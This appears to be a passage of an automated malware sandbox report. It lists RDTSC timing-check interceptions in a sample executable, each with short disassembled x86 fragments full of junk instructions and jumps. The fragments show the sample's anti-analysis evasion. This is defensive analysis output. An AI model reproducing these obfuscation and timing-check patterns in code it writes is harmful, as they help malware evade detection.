                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430DF7 second address: 5430DFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 541027F second address: 5410285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5410285 second address: 54102B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F43C9098CF5h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54102B6 second address: 54102BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54102BC second address: 54102C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54102C0 second address: 5410303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F43C8AE0089h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F43C8AE007Dh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5410303 second address: 541034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43C9098CF7h 0x00000009 sbb ecx, 1C3A5D0Eh 0x0000000f jmp 00007F43C9098CF9h 0x00000014 popfd 0x00000015 mov ah, BAh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 541034B second address: 541034F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 541034F second address: 5410355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5410355 second address: 541035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 541035B second address: 541035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 541035F second address: 541039D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F43C8AE0088h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 541039D second address: 54103A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54103A3 second address: 54103B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54103B4 second address: 54103D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43C9098CF8h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F058A second address: 53F058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53F058E second address: 53F060A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov ax, bx 0x0000000d pushfd 0x0000000e jmp 00007F43C9098CF1h 0x00000013 and al, 00000056h 0x00000016 jmp 00007F43C9098CF1h 0x0000001b popfd 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007F43C9098CF3h 0x00000026 pushfd 0x00000027 jmp 00007F43C9098CF8h 0x0000002c jmp 00007F43C9098CF5h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5400ED5 second address: 5400F1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F43C8AE0084h 0x00000010 jmp 00007F43C8AE0082h 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d mov ebx, 71E21A1Eh 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5400F1A second address: 5400F42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, C2F7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F43C9098CF9h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5400F42 second address: 5400F52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE007Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430669 second address: 543066D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 543066D second address: 5430671 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430671 second address: 5430677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430677 second address: 543067D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 543067D second address: 54306CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F43C9098CF0h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F43C9098CF3h 0x00000019 and cx, 900Eh 0x0000001e jmp 00007F43C9098CF9h 0x00000023 popfd 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54306CE second address: 543071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 jmp 00007F43C8AE007Ch 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F43C8AE007Ch 0x00000015 sbb ecx, 3828C9B8h 0x0000001b jmp 00007F43C8AE007Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ecx 0x00000023 pushad 0x00000024 pushad 0x00000025 mov edi, ecx 0x00000027 call 00007F43C8AE007Eh 0x0000002c pop esi 0x0000002d popad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 543071B second address: 543072E instructions: 0x00000000 rdtsc 0x00000002 mov al, BFh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [774365FCh] 0x0000000c pushad 0x0000000d mov ax, di 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 543072E second address: 543073C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 test eax, eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 543073C second address: 5430740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430740 second address: 5430752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430752 second address: 5430758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430758 second address: 543075C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 543075C second address: 5430770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F443B01BEE8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430770 second address: 5430774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 5430774 second address: 543077A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 543077A second address: 54307DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007F43C8AE007Eh 0x00000010 xor eax, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 mov ax, bx 0x00000017 mov eax, edx 0x00000019 popad 0x0000001a and ecx, 1Fh 0x0000001d jmp 00007F43C8AE0085h 0x00000022 ror eax, cl 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F43C8AE0088h 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54307DB second address: 54307E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54307E1 second address: 543084E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F43C8AE007Eh 0x00000011 xor ax, 5258h 0x00000016 jmp 00007F43C8AE007Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F43C8AE0088h 0x00000022 or ah, FFFFFFB8h 0x00000025 jmp 00007F43C8AE007Bh 0x0000002a popfd 0x0000002b popad 0x0000002c retn 0004h 0x0000002f nop 0x00000030 mov esi, eax 0x00000032 lea eax, dword ptr [ebp-08h] 0x00000035 xor esi, dword ptr [00C42014h] 0x0000003b push eax 0x0000003c push eax 0x0000003d push eax 0x0000003e lea eax, dword ptr [ebp-10h] 0x00000041 push eax 0x00000042 call 00007F43CD3107F7h 0x00000047 push FFFFFFFEh 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c mov bx, 20A6h 0x00000050 mov cx, bx 0x00000053 popad 0x00000054 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 543084E second address: 54308C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F43C9098CF6h 0x00000008 pop esi 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F43C9098CF8h 0x00000017 sub ax, B8A8h 0x0000001c jmp 00007F43C9098CEBh 0x00000021 popfd 0x00000022 push eax 0x00000023 mov dx, 6B4Ah 0x00000027 pop edi 0x00000028 popad 0x00000029 ret 0x0000002a nop 0x0000002b push eax 0x0000002c call 00007F43CD8C94C1h 0x00000031 mov edi, edi 0x00000033 pushad 0x00000034 pushad 0x00000035 mov edi, 2303191Ch 0x0000003a popad 0x0000003b mov si, di 0x0000003e popad 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F43C9098CF3h 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 54308C6 second address: 54308EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov al, bh 0x00000011 push ecx 0x00000012 pop edx 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E00A5 second address: 53E00AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E00AB second address: 53E00AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E00AF second address: 53E0150 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F43C9098CEEh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 jmp 00007F43C9098CEEh 0x00000018 mov ax, 2641h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F43C9098CEDh 0x00000025 adc si, 7696h 0x0000002a jmp 00007F43C9098CF1h 0x0000002f popfd 0x00000030 pushfd 0x00000031 jmp 00007F43C9098CF0h 0x00000036 or cx, F6B8h 0x0000003b jmp 00007F43C9098CEBh 0x00000040 popfd 0x00000041 popad 0x00000042 xchg eax, ebx 0x00000043 jmp 00007F43C9098CF6h 0x00000048 mov ebx, dword ptr [ebp+10h] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E0150 second address: 53E0156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E0156 second address: 53E0190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F43C9098CF0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F43C9098CEEh 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E0190 second address: 53E0196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E0196 second address: 53E01ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov ecx, edi 0x0000000c pushfd 0x0000000d jmp 00007F43C9098CEBh 0x00000012 sub si, 589Eh 0x00000017 jmp 00007F43C9098CF9h 0x0000001c popfd 0x0000001d popad 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F43C9098CF8h 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E01ED second address: 53E01FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E01FC second address: 53E0202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E0202 second address: 53E024F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F43C8AE007Ch 0x0000000e mov dword ptr [esp], edi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F43C8AE007Eh 0x00000018 and si, FF58h 0x0000001d jmp 00007F43C8AE007Bh 0x00000022 popfd 0x00000023 pushad 0x00000024 mov esi, 36AE4EA5h 0x00000029 popad 0x0000002a popad 0x0000002b test esi, esi 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov cx, 56FFh 0x00000034 push eax 0x00000035 pop ebx 0x00000036 popad 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E024F second address: 53E02BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43C9098CF7h 0x00000009 xor esi, 5AABF37Eh 0x0000000f jmp 00007F43C9098CF9h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F443B06706Ch 0x00000020 jmp 00007F43C9098CEAh 0x00000025 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002c pushad 0x0000002d mov si, 698Dh 0x00000031 mov di, si 0x00000034 popad 0x00000035 je 00007F443B067062h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E02BB second address: 53E02BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E02BF second address: 53E02C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E02C5 second address: 53E0350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43C8AE0086h 0x00000009 jmp 00007F43C8AE0085h 0x0000000e popfd 0x0000000f mov ah, DEh 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 pushad 0x00000018 mov dx, F27Ch 0x0000001c pushfd 0x0000001d jmp 00007F43C8AE0085h 0x00000022 or ecx, 1E9399D6h 0x00000028 jmp 00007F43C8AE0081h 0x0000002d popfd 0x0000002e popad 0x0000002f or edx, dword ptr [ebp+0Ch] 0x00000032 jmp 00007F43C8AE007Eh 0x00000037 test edx, 61000000h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 mov eax, 716862D3h 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E0350 second address: 53E035D instructions: 0x00000000 rdtsc 0x00000002 mov eax, 224C592Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov edx, ecx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E035D second address: 53E03C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F443AAAE39Ch 0x0000000b pushad 0x0000000c jmp 00007F43C8AE0085h 0x00000011 popad 0x00000012 test byte ptr [esi+48h], 00000001h 0x00000016 jmp 00007F43C8AE007Eh 0x0000001b jne 00007F443AAAE386h 0x00000021 pushad 0x00000022 mov cl, 2Eh 0x00000024 pushad 0x00000025 mov ebx, 02C9C3FCh 0x0000002a jmp 00007F43C8AE0085h 0x0000002f popad 0x00000030 popad 0x00000031 test bl, 00000007h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F43C8AE007Dh 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E03C9 second address: 53E03D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CECh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53E03D9 second address: 53E03DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0768 second address: 53D0785 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F43C9098CEDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0785 second address: 53D0789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0789 second address: 53D078F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D078F second address: 53D07E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43C8AE0080h 0x00000009 jmp 00007F43C8AE0085h 0x0000000e popfd 0x0000000f jmp 00007F43C8AE0080h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 and esp, FFFFFFF8h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F43C8AE0087h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D07E8 second address: 53D0800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C9098CF4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0800 second address: 53D0839 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F43C8AE0086h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F43C8AE007Eh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0839 second address: 53D083F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D083F second address: 53D0868 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F43C8AE0089h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0868 second address: 53D087B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D087B second address: 53D0893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43C8AE0084h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D0893 second address: 53D08E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C9098CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F43C9098CEFh 0x00000012 mov ah, 26h 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 jmp 00007F43C9098CEBh 0x0000001b mov esi, dword ptr [ebp+08h] 0x0000001e jmp 00007F43C9098CF6h 0x00000023 sub ebx, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D08E5 second address: 53D08E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\msqT9atzYW.exeRDTSC instruction interceptor: First address: 53D08E9 second address: 53D08EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
